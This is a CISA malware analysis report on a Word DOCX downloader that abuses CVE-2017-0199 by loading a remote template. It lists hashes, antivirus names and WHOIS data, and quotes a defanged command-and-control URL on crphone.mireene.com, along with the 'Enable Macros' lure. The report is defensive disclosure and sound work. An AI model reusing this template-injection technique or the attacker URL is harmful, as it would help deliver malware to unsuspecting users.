Malware Analysis Report (AR20-133G)

MAR-10285677-2.v1

 

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

One Microsoft Word Open Extensible Markup Language (XML) Format Document file (DOCX file) was submitted for analysis. The file attempts to download a Microsoft Word template from a Uniform Resource Locator (URL). The URL was not active at the time of analysis.

For a downloadable copy of IOCs, see MAR-10285677-2.v1.stix.

Submitted Files (1)

7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015 (7d2b9f391588cc07d9ba78d652819d...)

Domains (1)

crphone.mireene.com

Findings

7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015

Tags

CVE-2017-0199downloadertrojan

Details
Name 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015
Size 225448 bytes
Type Microsoft Word 2007+
MD5 a4388c4d0588cd3d8a607594347663e0
SHA1 b066369bbd48b7858f2c1eed1e78d85c8ae4cdb6
SHA256 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015
SHA512 6cb4ade649094cf14735830627497826f40fabb400308cfc9ebe4c262dd6dd49185baab877d5393a67df2516b3f99a7b5ab8f958d7ccddb5c0838b48814532f1
ssdeep 6144:PMtCBStDIwnddEwBj6U19akUWzZECImdzxGdakUWzZECImdzxGdm:ktCBPwnddEwJ6Umk0ChGck0ChGs
Entropy 7.965669
Antivirus
Ahnlab DOC/Downloader
Antiy Trojan[Exploit]/MSOffice.CVE-2017-0199
Avira EXP/CVE-2017-0199.joxaz
BitDefender Trojan.GenericKD.42863619
ESET DOC/TrojanDownloader.Agent.CF trojan
Emsisoft Trojan.GenericKD.42863619 (B)
Ikarus Exploit.CVE-2017-0199
McAfee Trojan-FRVP!201AEB7EC56D
Microsoft Security Essentials Exploit:O97M/CVE-2017-0199!MTB
NANOAV Exploit.Xml.CVE-2017-0199.equmby
Sophos Troj/DocDl-XXQ
Symantec W97M.Downloader
Vir.IT eXplorer W97M.Downloader.CBT
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
7d2b9f3915... Connected_To crphone.mireene.com
Description

This file is a Microsoft Word DOCX file (Figure 1). One of the XML files, "settings.xml.rels" (Figure 2), contains a target for a template located at the following URL:

--Begin URL--
hxxp[:]//crphone.mireene[.]com/plugin/editor/Templates/normal.php?name=web
--End URL--

If a user opens the document in Word, the document entices the user to "Enable Macros". This technique is used to trick the user, because the document does not contain macros and will attempt to load the template from the external network location. The URL was not available at the time of analysis.

Screenshots
Figure 1 - Screenshot of the DOCX file.

Figure 1 - Screenshot of the DOCX file.

Figure 2 - This XML file contains an external location to a URL to download a suspicious Microsoft Word template.

Figure 2 - This XML file contains an external location to a URL to download a suspicious Microsoft Word template.

crphone.mireene.com

Tags

command-and-control

URLs
  • hxxp[:]//crphone.mireene.com/plugin/editor/Templates/normal.php?name=web
Whois

Domain Name: MIREENE.COM
Registry Domain ID: 118139791_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.doregi.com
Registrar URL: http://www.doregi.com
Updated Date: 2017-02-23T02:39:15Z
Creation Date: 2004-04-24T02:46:25Z
Registry Expiry Date: 2021-04-24T02:46:25Z
Registrar: HANGANG Systems, Inc. dba Doregi.com
Registrar IANA ID: 87
Registrar Abuse Contact Email: abuse@doregi.com
Registrar Abuse Contact Phone: +82.7071631100
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.MIREENE.COM
Name Server: NS2.MIREENE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2020-04-27T11:39:43Z <<<

Relationships
crphone.mireene.com Connected_From 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015
Description

The file attempts to download a potential Microsoft word template from the domain.

Relationship Summary

7d2b9f3915... Connected_To crphone.mireene.com
crphone.mireene.com Connected_From 7d2b9f391588cc07d9ba78d652819d32d3d79e5a74086b527c32126ad88b5015

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Was this document helpful?  Yes  |  Somewhat  |  No